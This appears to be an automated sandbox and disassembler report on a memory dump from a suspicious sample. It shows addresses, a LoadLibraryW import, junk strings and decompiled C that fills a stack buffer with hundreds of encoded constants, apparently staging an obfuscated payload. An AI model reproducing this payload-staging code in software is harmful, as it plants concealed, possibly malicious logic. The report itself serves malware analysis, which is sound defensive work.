0x02d68fe6
0x02d68ff0
0x02d68ffa
0x02d69004
0x02d6900e
0x02d69018
0x02d69022
0x02d6902c
0x02d69036
0x02d69040
0x02d6904a
0x02d69054
0x02d6905e
0x02d69068
0x02d69072
0x02d6907c
0x02d69086
0x02d69090
0x02d6909a
0x02d690a4
0x02d690ae
0x02d690b8
0x02d690c2
0x02d690cc
0x02d690d6
0x02d690e0
0x02d690ea
0x02d690f4
0x02d690fe
0x02d69108
0x02d69112
0x02d6911c
0x02d6912b
0x02d69135
0x02d6913f
0x02d69149
0x02d69153
0x02d6915d
0x02d69164
0x02d6916b
0x02d69172
0x02d69179
0x02d69180
0x02d69187
0x02d6918e
0x02d69195
0x02d6919c
0x02d691a3
0x02d691aa
0x02d691b1
0x02d691b8
0x02d691bf
0x02d691c6
0x02d691cd
0x02d691d4
0x02d691db
0x02d691e2
0x02d691e9
0x02d691f0
0x02d691f7
0x02d691fe
0x02d69205
0x02d6920c
0x02d69213
0x02d6921a
0x02d69221
0x02d69228
0x02d6922f
0x02d69236
0x02d69245
0x02d69250
0x02d69255
0x02d69281

APIs

LoadLibraryW.KERNEL32(00000000), ref: 02D69248

Strings

v9C, xrefs: 02D68F64
= L-, xrefs: 02D68500
GQ:, xrefs: 02D68460
)c=, xrefs: 02D688DE
x, xrefs: 02D68B18
;X~, xrefs: 02D68A00
-v8W, xrefs: 02D684BA
9N, xrefs: 02D68726
2Hl9, xrefs: 02D690D6
\Oh, xrefs: 02D686F4
', xrefs: 02D6833E
`[3f, xrefs: 02D685F0
vrSw, xrefs: 02D68B2C
+?5, xrefs: 02D69195
FKx|, xrefs: 02D68E42
]7, xrefs: 02D68F8C
}#y, xrefs: 02D690C2
SD`, xrefs: 02D68FAA
id]], xrefs: 02D686E0
TyFi, xrefs: 02D68212
`h, xrefs: 02D68550
I5OD, xrefs: 02D68B68

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: }#y$ +?5$)c=$-v8W$2Hl9$;X~$= L-$FKx|$GQ:$I5OD$SD`$TyFi$\Oh$`[3f$id]]$vrSw$v9C$'$9N$`h$]7$x
API String ID: 1029625771-4077638660
Opcode ID: 00a2067101c3561ef5a5d5d86b0dc93e63220fdf2ecf036aafc586d91fa5cb62
Instruction ID: e5509644d92b21617c393c19a4213cb0d06615ae92104eebfbcbb798f234f31a
Opcode Fuzzy Hash: 00a2067101c3561ef5a5d5d86b0dc93e63220fdf2ecf036aafc586d91fa5cb62
Instruction Fuzzy Hash: AF82A5F48567A98FDB619F429E857CEBA31BB51304F5082C8C19D3B215CB760B86CF89

Uniqueness

Uniqueness Score: -1.00%

Function 02D6A78A, Relevance: 39.0, APIs: 1, Strings: 21, Instructions: 474
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E02D6A78A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t458;
				void* _t468;

				_t458 = __ebx;
				 *((intOrPtr*)(_t468 - 0x710)) = 0xbbfc645e;
				 *((intOrPtr*)(_t468 - 0x70c)) = 0xff9e9182;
				 *((intOrPtr*)(_t468 - 0x708)) = 0x452698cc;
				 *((intOrPtr*)(_t468 - 0x704)) = 0x3e315c09;
				 *((intOrPtr*)(_t468 - 0x700)) = 0xd583af25;
				 *((intOrPtr*)(_t468 - 0x6fc)) = 0x26128328;
				 *((intOrPtr*)(_t468 - 0x6f8)) = 0x80297ce5;
				 *((intOrPtr*)(_t468 - 0x6f4)) = 0xdd673d57;
				 *((intOrPtr*)(_t468 - 0x6f0)) = 0x62f70e20;
				 *((intOrPtr*)(_t468 - 0x6ec)) = 0x4710a533;
				 *((intOrPtr*)(_t468 - 0x6e8)) = 0xdd43f7be;
				 *((intOrPtr*)(_t468 - 0x6e4)) = 0x5f5962c8;
				 *((intOrPtr*)(_t468 - 0x6e0)) = 0x5d16f724;
				 *((intOrPtr*)(_t468 - 0x6dc)) = 0xaa6ced9c;
				 *((intOrPtr*)(_t468 - 0x6d8)) = 0x73213cc0;
				 *((intOrPtr*)(_t468 - 0x6d4)) = 0xce1a639a;
				 *((intOrPtr*)(_t468 - 0x6d0)) = 0x441f6a7f;
				 *((intOrPtr*)(_t468 - 0x6cc)) = 0x7e5532f7;
				 *((intOrPtr*)(_t468 - 0x6c8)) = 0xc376d8ac;
				 *((intOrPtr*)(_t468 - 0x6c4)) = 0xc98446c7;
				 *((intOrPtr*)(_t468 - 0x6c0)) = 0xf1eb46fb;
				 *((intOrPtr*)(_t468 - 0x6bc)) = 0x13efc58c;
				 *((intOrPtr*)(_t468 - 0x6b8)) = 0xdce8392b;
				 *((intOrPtr*)(_t468 - 0x6b4)) = 0xff196b13;
				 *((intOrPtr*)(_t468 - 0x6b0)) = 0xd8cbd1b5;
				 *((intOrPtr*)(_t468 - 0x6ac)) = 0x81da5360;
				 *((intOrPtr*)(_t468 - 0x6a8)) = 0x5a4b53a0;
				 *((intOrPtr*)(_t468 - 0x6a4)) = 0x19cfd945;
				 *((intOrPtr*)(_t468 - 0x6a0)) = 0xa1152509;
				 *((intOrPtr*)(_t468 - 0x69c)) = 0x38cb65eb;
				 *((intOrPtr*)(_t468 - 0x698)) = 0x8b3492c9;
				 *((intOrPtr*)(_t468 - 0x694)) = 0xfcb87c2e;
				 *((intOrPtr*)(_t468 - 0x690)) = 0x8e9b0c47;
				 *((intOrPtr*)(_t468 - 0x68c)) = 0x5b3fc5ee;
				 *((intOrPtr*)(_t468 - 0x688)) = 0xc5fe827;
				 *((intOrPtr*)(_t468 - 0x684)) = 0xa9bd311d;
				 *((intOrPtr*)(_t468 - 0x680)) = 0x7ee72ef4;
				 *((intOrPtr*)(_t468 - 0x67c)) = 0xc97f5ce3;
				 *((intOrPtr*)(_t468 - 0x678)) = 0xbf86e7ef;
				 *((intOrPtr*)(_t468 - 0x674)) = 0x85913571;
				 *((intOrPtr*)(_t468 - 0x670)) = 0xfb927d4c;
				 *((intOrPtr*)(_t468 - 0x66c)) = 0xdf0fde0d;
				 *((intOrPtr*)(_t468 - 0x668)) = 0xf8614e0f;
				 *((intOrPtr*)(_t468 - 0x664)) = 0xd3a7b344;
				 *((intOrPtr*)(_t468 - 0x660)) = 0xdace256e;
				 *((intOrPtr*)(_t468 - 0x65c)) = 0x999aea87;
				 *((intOrPtr*)(_t468 - 0x658)) = 0xf12a872b;
				 *((intOrPtr*)(_t468 - 0x654)) = 0x7db0c343;
				 *((intOrPtr*)(_t468 - 0x650)) = 0x2fab1ac6;
				 *((intOrPtr*)(_t468 - 0x64c)) = 0xe0a26f36;
				 *((intOrPtr*)(_t468 - 0x648)) = 0x38bf7c0d;
				 *((intOrPtr*)(_t468 - 0x644)) = 0x8587c8cf;
				 *((intOrPtr*)(_t468 - 0x640)) = 0xd8f98b5e;
				 *((intOrPtr*)(_t468 - 0x63c)) = 0xa8159ffb;
				 *((intOrPtr*)(_t468 - 0x638)) = 0x62415296;
				 *((intOrPtr*)(_t468 - 0x634)) = 0xf69bf96c;
				 *((intOrPtr*)(_t468 - 0x630)) = 0x3d672fe5;
				 *((intOrPtr*)(_t468 - 0x62c)) = 0x92016be;
				 *((intOrPtr*)(_t468 - 0x628)) = 0xe6965c40;
				 *((intOrPtr*)(_t468 - 0x624)) = 0x6444895;
				 *((intOrPtr*)(_t468 - 0x620)) = 0x536c8808;
				 *((intOrPtr*)(_t468 - 0x61c)) = 0x2fae4fc3;
				 *((intOrPtr*)(_t468 - 0x618)) = 0x60b08bcc;
				 *((intOrPtr*)(_t468 - 0x614)) = 0x8b72104e;
				 *((intOrPtr*)(_t468 - 0x610)) = 0xc4cddfe3;
				 *((intOrPtr*)(_t468 - 0x60c)) = 0x82e9ff73;
				 *((intOrPtr*)(_t468 - 0x608)) = 0xa3ec5e2c;
				 *((intOrPtr*)(_t468 - 0x604)) = 0xd34f53ff;
				 *((intOrPtr*)(_t468 - 0x600)) = 0x43c09699;
				 *((intOrPtr*)(_t468 - 0x5fc)) = 0x983efa4f;
				 *((intOrPtr*)(_t468 - 0x5f8)) = 0x2e60c48d;
				 *((intOrPtr*)(_t468 - 0x5f4)) = 0x201abcd1;
				 *((intOrPtr*)(_t468 - 0x5f0)) = 0xa1c30b63;
				 *((intOrPtr*)(_t468 - 0x5ec)) = 0xbf06c4a5;
				 *((intOrPtr*)(_t468 - 0x5e8)) = 0x95e66026;
				 *((intOrPtr*)(_t468 - 0x5e4)) = 0x8f23da5b;
				 *((intOrPtr*)(_t468 - 0x5e0)) = 0x644c8c63;
				 *((intOrPtr*)(_t468 - 0x5dc)) = 0x27b0c75a;
				 *((intOrPtr*)(_t468 - 0x5d8)) = 0x7031e053;
				 *((intOrPtr*)(_t468 - 0x5d4)) = 0x255a54f3;
				 *((intOrPtr*)(_t468 - 0x5d0)) = 0xc9a2b785;
				 *((intOrPtr*)(_t468 - 0x5cc)) = 0xd8353aa3;
				 *((intOrPtr*)(_t468 - 0x5c8)) = 0x165b0786;
				 *((intOrPtr*)(_t468 - 0x5c4)) = 0xaa2b40b1;
				 *((intOrPtr*)(_t468 - 0x5c0)) = 0xae32d584;
				 *((intOrPtr*)(_t468 - 0x5bc)) = 0x578e93d9;
				 *((intOrPtr*)(_t468 - 0x5b8)) = 0xf1dbf9dc;
				 *((intOrPtr*)(_t468 - 0x5b4)) = 0x735c9bc8;
				 *((intOrPtr*)(_t468 - 0x5b0)) = 0x9591d86a;
				 *((intOrPtr*)(_t468 - 0x5ac)) = 0xfbceefb8;
				 *((intOrPtr*)(_t468 - 0x5a8)) = 0xd2c3a306;
				 *((intOrPtr*)(_t468 - 0x5a4)) = 0xd1f0c27c;
				 *((intOrPtr*)(_t468 - 0x5a0)) = 0xee7b4aa4;
				 *((intOrPtr*)(_t468 - 0x59c)) = 0x13e870ec;
				 *((intOrPtr*)(_t468 - 0x598)) = 0xc55f4ad;
				 *((intOrPtr*)(_t468 - 0x594)) = 0x65e147fd;
				 *((intOrPtr*)(_t468 - 0x590)) = 0xce3b939c;
				 *((intOrPtr*)(_t468 - 0x58c)) = 0x85c47a97;
				 *((intOrPtr*)(_t468 - 0x588)) = 0x8733ed5f;
				 *((intOrPtr*)(_t468 - 0x584)) = 0xc1f9a83;
				 *((intOrPtr*)(_t468 - 0x580)) = 0xc3d1cef4;
				 *((intOrPtr*)(_t468 - 0x57c)) = 0x88af6cd9;
				 *((intOrPtr*)(_t468 - 0x578)) = 0x5113ece8;
				 *((intOrPtr*)(_t468 - 0x574)) = 0x60354e52;
				 *((intOrPtr*)(_t468 - 0x570)) = 0xa3c1503b;
				 *((intOrPtr*)(_t468 - 0x56c)) = 0x62ce4f08;
				 *((intOrPtr*)(_t468 - 0x568)) = 0xbba3a5c4;
				 *((intOrPtr*)(_t468 - 0x564)) = 0xaa6ce51c;
				 *((intOrPtr*)(_t468 - 0x560)) = 0xfeaaf4af;
				 *((intOrPtr*)(_t468 - 0x55c)) = 0xf2b87eed;
				 *((intOrPtr*)(_t468 - 0x558)) = 0xbd877de0;
				 *((intOrPtr*)(_t468 - 0x554)) = 0x938ec5ac;
				 *((intOrPtr*)(_t468 - 0x550)) = 0x5d7eb167;
				 *((intOrPtr*)(_t468 - 0x54c)) = 0x63307a97;
				 *((intOrPtr*)(_t468 - 0x548)) = 0x13706b2e;
				 *((intOrPtr*)(_t468 - 0x544)) = 0x576ba941;
				 *((intOrPtr*)(_t468 - 0x540)) = 0xbab87b6e;
				 *((intOrPtr*)(_t468 - 0x53c)) = 0x6676a02b;
				 *((intOrPtr*)(_t468 - 0x538)) = 0xffea16b1;
				 *((intOrPtr*)(_t468 - 0x534)) = 0xd0789582;
				 *((intOrPtr*)(_t468 - 0x530)) = 0x6ff515c2;
				 *((intOrPtr*)(_t468 - 0x52c)) = 0x3e6b6991;
				 *((intOrPtr*)(_t468 - 0x528)) = 0x495a2e09;
				 *((intOrPtr*)(_t468 - 0x524)) = 0x547bb0f2;
				 *((intOrPtr*)(_t468 - 0x520)) = 0x2a8353cb;
				 *((intOrPtr*)(_t468 - 0x51c)) = 0xf9c3a727;
				 *((intOrPtr*)(_t468 - 0x518)) = 0x2aeed163;
				 *((intOrPtr*)(_t468 - 0x514)) = 0x5187ae62;
				 *((intOrPtr*)(_t468 - 0x510)) = 0x1f86fd96;
				 *((intOrPtr*)(_t468 - 0x50c)) = 0x6a9f77a4;
				 *((intOrPtr*)(_t468 - 0x508)) = 0xd9bc5bfb;
				 *((intOrPtr*)(_t468 - 0x504)) = 0x5c0c6cd4;
				 *((intOrPtr*)(_t468 - 0x500)) = 0x66c0d98c;
				 *((intOrPtr*)(_t468 - 0x4fc)) = 0x9360cd60;
				 *((intOrPtr*)(_t468 - 0x4f8)) = 0xe11a61d4;
				 *((intOrPtr*)(_t468 - 0x4f4)) = 0x2d3771a2;
				 *((intOrPtr*)(_t468 - 0x4f0)) = 0x25556489;
				 *((intOrPtr*)(_t468 - 0x4ec)) = 0x4f4fdf6;
				 *((intOrPtr*)(_t468 - 0x4e8)) = 0x7e375a2f;
				 *((intOrPtr*)(_t468 - 0x4e4)) = 0x9e9fbde4;
				 *((intOrPtr*)(_t468 - 0x4e0)) = 0x16dc796b;
				 *((intOrPtr*)(_t468 - 0x4dc)) = 0x495e6ac4;
				 *((intOrPtr*)(_t468 - 0x4d8)) = 0xbfbad193;
				 *((intOrPtr*)(_t468 - 0x4d4)) = 0xa8382252;
				 *((intOrPtr*)(_t468 - 0x4d0)) = 0x5fb45b25;
				 *((intOrPtr*)(_t468 - 0x4cc)) = 0x42b8a75a;
				 *((intOrPtr*)(_t468 - 0x4c8)) = 0x6c1e671a;
				 *((intOrPtr*)(_t468 - 0x4c4)) = 0xbfc39af5;
				 *((intOrPtr*)(_t468 - 0x4c0)) = 0x526603ac;
				 *((intOrPtr*)(_t468 - 0x4bc)) = 0xc080c86a;
				 *((intOrPtr*)(_t468 - 0x4b8)) = 0x73c3cc65;
				 *((intOrPtr*)(_t468 - 0x4b4)) = 0xfeb1fc27;
				 *((intOrPtr*)(_t468 - 0x4b0)) = 0xfc157476;
				 *((intOrPtr*)(_t468 - 0x4ac)) = 0x518f70a3;
				 *((intOrPtr*)(_t468 - 0x4a8)) = 0x387d10a2;
				 *((intOrPtr*)(_t468 - 0x4a4)) = 0xddc1a590;
				 *((intOrPtr*)(_t468 - 0x4a0)) = 0x43054562;
				 *((intOrPtr*)(_t468 - 0x49c)) = 0x3dc879cc;
				 *((intOrPtr*)(_t468 - 0x498)) = 0xf53d08ba;
				 *((intOrPtr*)(_t468 - 0x494)) = 0xf6f6e366;
				 *((intOrPtr*)(_t468 - 0x490)) = 0x59a7efcf;
				 *((intOrPtr*)(_t468 - 0x48c)) = 0xb802a60b;
				 *((intOrPtr*)(_t468 - 0x488)) = 0xbf456edb;
				 *((intOrPtr*)(_t468 - 0x484)) = 0x9b4adef;
				 *((intOrPtr*)(_t468 - 0x480)) = 0x272eb9da;
				 *((intOrPtr*)(_t468 - 0x47c)) = 0xb63ce874;
				 *((intOrPtr*)(_t468 - 0x478)) = 0x5579b301;
				 *((intOrPtr*)(_t468 - 0x474)) = 0xa02a2251;
				 *((intOrPtr*)(_t468 - 0x470)) = 0x4d13ecff;
				 *((intOrPtr*)(_t468 - 0x46c)) = 0x8bd6e9d3;
				 *((intOrPtr*)(_t468 - 0x468)) = 0x3a46f0f4;
				 *((intOrPtr*)(_t468 - 0x464)) = 0x43232027;
				 *((intOrPtr*)(_t468 - 0x460)) = 0x246b9e6;
				 *((intOrPtr*)(_t468 - 0x45c)) = 0xe775a0ca;
				 *((intOrPtr*)(_t468 - 0x458)) = 0x82c04642;
				 *((intOrPtr*)(_t468 - 0x454)) = 0x185c35ca;
				 *((intOrPtr*)(_t468 - 0x450)) = 0xbea3e173;
				 *((intOrPtr*)(_t468 - 0x44c)) = 0x79e8f113;
				 *((intOrPtr*)(_t468 - 0x448)) = 0x61e15ee0;
				 *((intOrPtr*)(_t468 - 0x444)) = 0xa1aff555;
				 *((intOrPtr*)(_t468 - 0x440)) = 0x9728428e;
				 *((intOrPtr*)(_t468 - 0x43c)) = 0xd25676e4;
				 *((intOrPtr*)(_t468 - 0x438)) = 0xa7195230;
				 *((intOrPtr*)(_t468 - 0x434)) = 0xc3205026;
				 *((intOrPtr*)(_t468 - 0x430)) = 0x7e6b9d0d;
				 *((intOrPtr*)(_t468 - 0x42c)) = 0x62c7a4e0;
				 *((intOrPtr*)(_t468 - 0x428)) = 0x35300c19;
				 *((intOrPtr*)(_t468 - 0x424)) = 0x31b50306;
				 *((intOrPtr*)(_t468 - 0x420)) = 0xe2df05c5;
				 *((intOrPtr*)(_t468 - 0x41c)) = 0x23d501ce;
				 *((intOrPtr*)(_t468 - 0x418)) = 0x55f74279;
				 *((intOrPtr*)(_t468 - 0x414)) = 0xae28357a;
				 *((intOrPtr*)(_t468 - 0x410)) = 0x4dd8c098;
				 *((intOrPtr*)(_t468 - 0x40c)) = 0xed2d871a;
				 *((intOrPtr*)(_t468 - 0x408)) = 0xc24b2925;
				 *((intOrPtr*)(_t468 - 0x404)) = 0xfb4153e4;
				 *((intOrPtr*)(_t468 - 0x400)) = 0xc1d0509b;
				 *((intOrPtr*)(_t468 - 0x3fc)) = 0x3d506657;
				 *((intOrPtr*)(_t468 - 0x3f8)) = 0xa2fc6e02;
				 *((intOrPtr*)(_t468 - 0x3f4)) = 0x3b8a2c2b;
				 *((intOrPtr*)(_t468 - 0x3f0)) = 0x664cfb7d;
				 *((intOrPtr*)(_t468 - 0x3ec)) = 0xaca28f76;
				 *((intOrPtr*)(_t468 - 0x3e8)) = 0x2fab1aac;
				 *((intOrPtr*)(_t468 - 0x3e4)) = 0x549e2ce7;
				 *((intOrPtr*)(_t468 - 0x3e0)) = 0xd02097b2;
				 *((intOrPtr*)(_t468 - 0x3dc)) = 0xbc7211ff;
				 *((intOrPtr*)(_t468 - 0x3d8)) = 0x69f4a23b;
				 *((intOrPtr*)(_t468 - 0x3d4)) = 0x20da8985;
				 *((intOrPtr*)(_t468 - 0x3d0)) = 0x5223d1c0;
				 *((intOrPtr*)(_t468 - 0x3cc)) = 0xab4090ae;
				 *((intOrPtr*)(_t468 - 0x3c8)) = 0xe4b806f3;
				 *((intOrPtr*)(_t468 - 0x3c4)) = 0xa7d1ae51;
				 *((intOrPtr*)(_t468 - 0x3c0)) = 0x54a5ee99;
				 *((intOrPtr*)(_t468 - 0x3bc)) = 0x87c872ac;
				 *((intOrPtr*)(_t468 - 0x3b8)) = 0x331de6d;
				 *((intOrPtr*)(_t468 - 0x3b4)) = 0xf24ef0d5;
				 *((intOrPtr*)(_t468 - 0x3b0)) = 0x5bd2d668;
				 *((intOrPtr*)(_t468 - 0x3ac)) = 0x8792f50c;
				 *((intOrPtr*)(_t468 - 0x3a8)) = 0xd7aefe25;
				 *((intOrPtr*)(_t468 - 0x3a4)) = 0xbbf036ff;
				 *((intOrPtr*)(_t468 - 0x3a0)) = 0xe6f49907;
				 *((intOrPtr*)(_t468 - 0x39c)) = 0x39816bcc;
				 *((intOrPtr*)(_t468 - 0x398)) = 0x68cb49e3;
				 *((intOrPtr*)(_t468 - 0x394)) = 0x17d98165;
				 *((intOrPtr*)(_t468 - 0x390)) = 0xaee48a5;
				 *((intOrPtr*)(_t468 - 0x38c)) = 0x529ece38;
				 *((intOrPtr*)(_t468 - 0x388)) = 0xfba0ef64;
				 *((intOrPtr*)(_t468 - 0x384)) = 0x286825ea;
				 *((intOrPtr*)(_t468 - 0x380)) = 0xd7f7ea4f;
				 *((intOrPtr*)(_t468 - 0x37c)) = 0x5b11e8a0;
				 *((intOrPtr*)(_t468 - 0x378)) = 0xf2541683;
				 *((intOrPtr*)(_t468 - 0x374)) = 0xb6fb2737;
				 *((intOrPtr*)(_t468 - 0x370)) = 0x14aef51;
				 *((intOrPtr*)(_t468 - 0x36c)) = 0x8d58b31e;
				 *((intOrPtr*)(_t468 - 0x368)) = 0xfde3bb4;
				 *((intOrPtr*)(_t468 - 0x364)) = 0x379aa8bb;
				 *((intOrPtr*)(_t468 - 0x360)) = 0xcbb173e4;
				 *((intOrPtr*)(_t468 - 0x35c)) = 0x6fdf9eaa;
				 *((intOrPtr*)(_t468 - 0x358)) = 0x2b943f6a;
				 *((intOrPtr*)(_t468 - 0x354)) = 0xd504eb43;
				 *((intOrPtr*)(_t468 - 0x350)) = 0x533e1de0;
				 *((intOrPtr*)(_t468 - 0x34c)) = 0xa276c59c;
				 *((intOrPtr*)(_t468 - 0x348)) = 0x60cfe563;
				 *((intOrPtr*)(_t468 - 0x344)) = 0xc28417e3;
				 *((intOrPtr*)(_t468 - 0x340)) = 0x58731393;
				 *((intOrPtr*)(_t468 - 0x33c)) = 0xbb80ceb3;
				 *((intOrPtr*)(_t468 - 0x338)) = 0x89c2bdb5;
				 *((intOrPtr*)(_t468 - 0x334)) = 0x10e0e3b8;
				 *((intOrPtr*)(_t468 - 0x330)) = 0x582b5da8;
				 *((intOrPtr*)(_t468 - 0x32c)) = 0xbe1a6529;
				 *((intOrPtr*)(_t468 - 0x328)) = 0x3c1c55a3;
				 *((intOrPtr*)(_t468 - 0x324)) = 0xaff9b7d0;
				 *((intOrPtr*)(_t468 - 0x320)) = 0x31da517f;
				 *((intOrPtr*)(_t468 - 0x31c)) = 0x58fd238a;
				 *((intOrPtr*)(_t468 - 0x318)) = 0xee7932e;
				 *((intOrPtr*)(_t468 - 0x314)) = 0xfc6423;
				 *((intOrPtr*)(_t468 - 0x310)) = 0x7f32b476;
				 *((intOrPtr*)(_t468 - 0x30c)) = 0x14cb043d;
				 *((intOrPtr*)(_t468 - 0x308)) = 0x477e9d74;
				 *((intOrPtr*)(_t468 - 0x304)) = 0x507322ca;
				 *((intOrPtr*)(_t468 - 0x300)) = 0x73dfcbb7;
				 *((intOrPtr*)(_t468 - 0x2fc)) = 0x6275924d;
				 *((intOrPtr*)(_t468 - 0x2f8)) = 0x560cf646;
				 *((intOrPtr*)(_t468 - 0x2f4)) = 0x24bb50b3;
				 *((intOrPtr*)(_t468 - 0x2f0)) = 0xbcaefb71;
				 *((intOrPtr*)(_t468 - 0x2ec)) = 0xdc52f35;
				 *((intOrPtr*)(_t468 - 0x2e8)) = 0x7be88ce6;
				 *((intOrPtr*)(_t468 - 0x2e4)) = 0x81da2139;
				 *((intOrPtr*)(_t468 - 0x2e0)) = 0x1902101c;
				 *((intOrPtr*)(_t468 - 0x2dc)) = 0x3d7498d9;
				 *((intOrPtr*)(_t468 - 0x2d8)) = 0xc96a34eb;
				 *((intOrPtr*)(_t468 - 0x2d4)) = 0x74af2943;
				 *((intOrPtr*)(_t468 - 0x2d0)) = 0x80a4ddf4;
				 *((intOrPtr*)(_t468 - 0x2cc)) = 0xdc537ec2;
				 *((intOrPtr*)(_t468 - 0x2c8)) = 0x8cb9df64;
				 *((intOrPtr*)(_t468 - 0x2c4)) = 0xb89e489d;
				 *((intOrPtr*)(_t468 - 0x2c0)) = 0x9ea724f2;
				 *((intOrPtr*)(_t468 - 0x2bc)) = 0xf54090ac;
				 *((intOrPtr*)(_t468 - 0x2b8)) = 0x47164e0;
				 *((intOrPtr*)(_t468 - 0x2b4)) = 0xbb58d485;
				 *((intOrPtr*)(_t468 - 0x2b0)) = 0xfa3ecd7e;
				 *((intOrPtr*)(_t468 - 0x2ac)) = 0xb7faff0d;
				 *((intOrPtr*)(_t468 - 0x2a8)) = 0x6dfd230b;
				 *((intOrPtr*)(_t468 - 0x2a4)) = 0x41e23406;
				 *((intOrPtr*)(_t468 - 0x2a0)) = 0x9906dd7b;
				 *((intOrPtr*)(_t468 - 0x29c)) = 0x2cba89ac;
				 *((intOrPtr*)(_t468 - 0x298)) = 0xe059ec92;
				 *((intOrPtr*)(_t468 - 0x294)) = 0xa9ba9428;
				 *((intOrPtr*)(_t468 - 0x290)) = 0xbc32055b;
				 *((intOrPtr*)(_t468 - 0x28c)) = 0xf7ed8bd8;
				 *((intOrPtr*)(_t468 - 0x288)) = 0x85bd50a0;
				 *((intOrPtr*)(_t468 - 0x284)) = 0x37ba4abb;
				 *((intOrPtr*)(_t468 - 0x280)) = 0x6e711e5d;
				 *((intOrPtr*)(_t468 - 0x27c)) = 0xa1a87d19;
				 *((intOrPtr*)(_t468 - 0x278)) = 0x82d19e21;
				 *((intOrPtr*)(_t468 - 0x274)) = 0x5debf227;
				 *((intOrPtr*)(_t468 - 0x270)) = 0x37197600;
				 *((intOrPtr*)(_t468 - 0x26c)) = 0xd26df97f;
				 *((intOrPtr*)(_t468 - 0x268)) = 0xad11b0ff;
				 *((intOrPtr*)(_t468 - 0x264)) = 0x9c74cdbe;
				 *((intOrPtr*)(_t468 - 0x260)) = 0x4f062ca1;
				 *((intOrPtr*)(_t468 - 0x25c)) = 0xba7ee75d;
				 *((intOrPtr*)(_t468 - 0x258)) = 0x739581f1;
				 *((intOrPtr*)(_t468 - 0x254)) = 0xf9ab5a22;
				 *((intOrPtr*)(_t468 - 0x250)) = 0x9078c325;
				 *((intOrPtr*)(_t468 - 0x24c)) = 0x202a2242;
				 *((intOrPtr*)(_t468 - 0x248)) = 0x2ad80adb;
				 *((intOrPtr*)(_t468 - 0x244)) = 0x14820037;
				 *((intOrPtr*)(_t468 - 0x240)) = 0x2236e4b0;
				 *((intOrPtr*)(_t468 - 0x23c)) = 0x88c03cfa;
				 *((intOrPtr*)(_t468 - 0x238)) = 0x6bff70ad;
				 *((intOrPtr*)(_t468 - 0x234)) = 0xfde1422f;
				 *((intOrPtr*)(_t468 - 0x230)) = 0x209db9e7;
				 *((intOrPtr*)(_t468 - 0x22c)) = 0x123d08d7;
				 *((intOrPtr*)(_t468 - 0x228)) = 0x17673eae;
				 *((intOrPtr*)(_t468 - 0x224)) = 0x716596af;
				 *((intOrPtr*)(_t468 - 0x220)) = 0x54491d1e;
				 *((intOrPtr*)(_t468 - 0x21c)) = 0x20b06704;
				 *((intOrPtr*)(_t468 - 0x218)) = 0x6633af41;
				 *((intOrPtr*)(_t468 - 0x214)) = 0xa03d3724;
				 *((intOrPtr*)(_t468 - 0x210)) = 0x7c510511;
				 *((intOrPtr*)(_t468 - 0x20c)) = 0xa4af7c44;
				 *((intOrPtr*)(_t468 - 0x208)) = 0x2c001dc;
				 *((intOrPtr*)(_t468 - 0x204)) = 0x3fec58f0;
				 *((intOrPtr*)(_t468 - 0x200)) = 0xd95417a9;
				 *((intOrPtr*)(_t468 - 0x1fc)) = 0x297bb87d;
				 *((intOrPtr*)(_t468 - 0x1f8)) = 0x26195aaa;
				 *((intOrPtr*)(_t468 - 0x1f4)) = 0xa7ff05fd;
				 *((intOrPtr*)(_t468 - 0x1f0)) = 0x34eb7a3d;
				 *((intOrPtr*)(_t468 - 0x1ec)) = 0x11fd6c1d;
				 *((intOrPtr*)(_t468 - 0x1e8)) = 0xa469c05c;
				 *((intOrPtr*)(_t468 - 0x1e4)) = 0xc2b48932;
				 *((intOrPtr*)(_t468 - 0x1e0)) = 0x532395bb;
				 *((intOrPtr*)(_t468 - 0x1dc)) = 0xe54465cb;
				 *((intOrPtr*)(_t468 - 0x1d8)) = 0xc82f4c82;
				 *((intOrPtr*)(_t468 - 0x1d4)) = 0xe283083f;
				 *((intOrPtr*)(_t468 - 0x1d0)) = 0x45487b9f;
				 *((intOrPtr*)(_t468 - 0x1cc)) = 0x272d4c4d;
				 *((intOrPtr*)(_t468 - 0x1c8)) = 0xbaf5447f;
				 *((intOrPtr*)(_t468 - 0x1c4)) = 0x742ec3c0;
				 *((intOrPtr*)(_t468 - 0x1c0)) = 0xf59935b9;
				 *((intOrPtr*)(_t468 - 0x1bc)) = 0x95f91c05;
				 *((intOrPtr*)(_t468 - 0x1b8)) = 0x802cd3f9;
				 *((intOrPtr*)(_t468 - 0x1b4)) = 0x1ab90565;
				 *((intOrPtr*)(_t468 - 0x1b0)) = 0x93a9ca8b;
				 *((intOrPtr*)(_t468 - 0x1ac)) = 0x8343d19b;
				 *((intOrPtr*)(_t468 - 0x1a8)) = 0x8994204d;
				 *((intOrPtr*)(_t468 - 0x1a4)) = 0x621df6ee;
				 *((intOrPtr*)(_t468 - 0x1a0)) = 0x6d40e9b1;
				 *((intOrPtr*)(_t468 - 0x19c)) = 0x497243d;
				 *((intOrPtr*)(_t468 - 0x198)) = 0x5f3d748f;
				 *((intOrPtr*)(_t468 - 0x194)) = 0xfb0914f4;
				 *((intOrPtr*)(_t468 - 0x190)) = 0x7c2468ac;
				 *((intOrPtr*)(_t468 - 0x18c)) = 0x9f8442cc;
				 *((intOrPtr*)(_t468 - 0x188)) = 0x25442048;
				 *((intOrPtr*)(_t468 - 0x184)) = 0x7d6e4a65;
				 *((intOrPtr*)(_t468 - 0x180)) = 0xd294fa64;
				 *((intOrPtr*)(_t468 - 0x17c)) = 0xb9fd5f8f;
				 *((intOrPtr*)(_t468 - 0x178)) = 0xde2b87a3;
				 *((intOrPtr*)(_t468 - 0x174)) = 0x4c59a395;
				 *((intOrPtr*)(_t468 - 0x170)) = 0x3d150fbd;
				 *((intOrPtr*)(_t468 - 0x16c)) = 0x5bba6b05;
				 *((intOrPtr*)(_t468 - 0x168)) = 0x1f562678;
				 *((intOrPtr*)(_t468 - 0x164)) = 0x6d5d35ca;
				 *((intOrPtr*)(_t468 - 0x160)) = 0x82efa4bf;
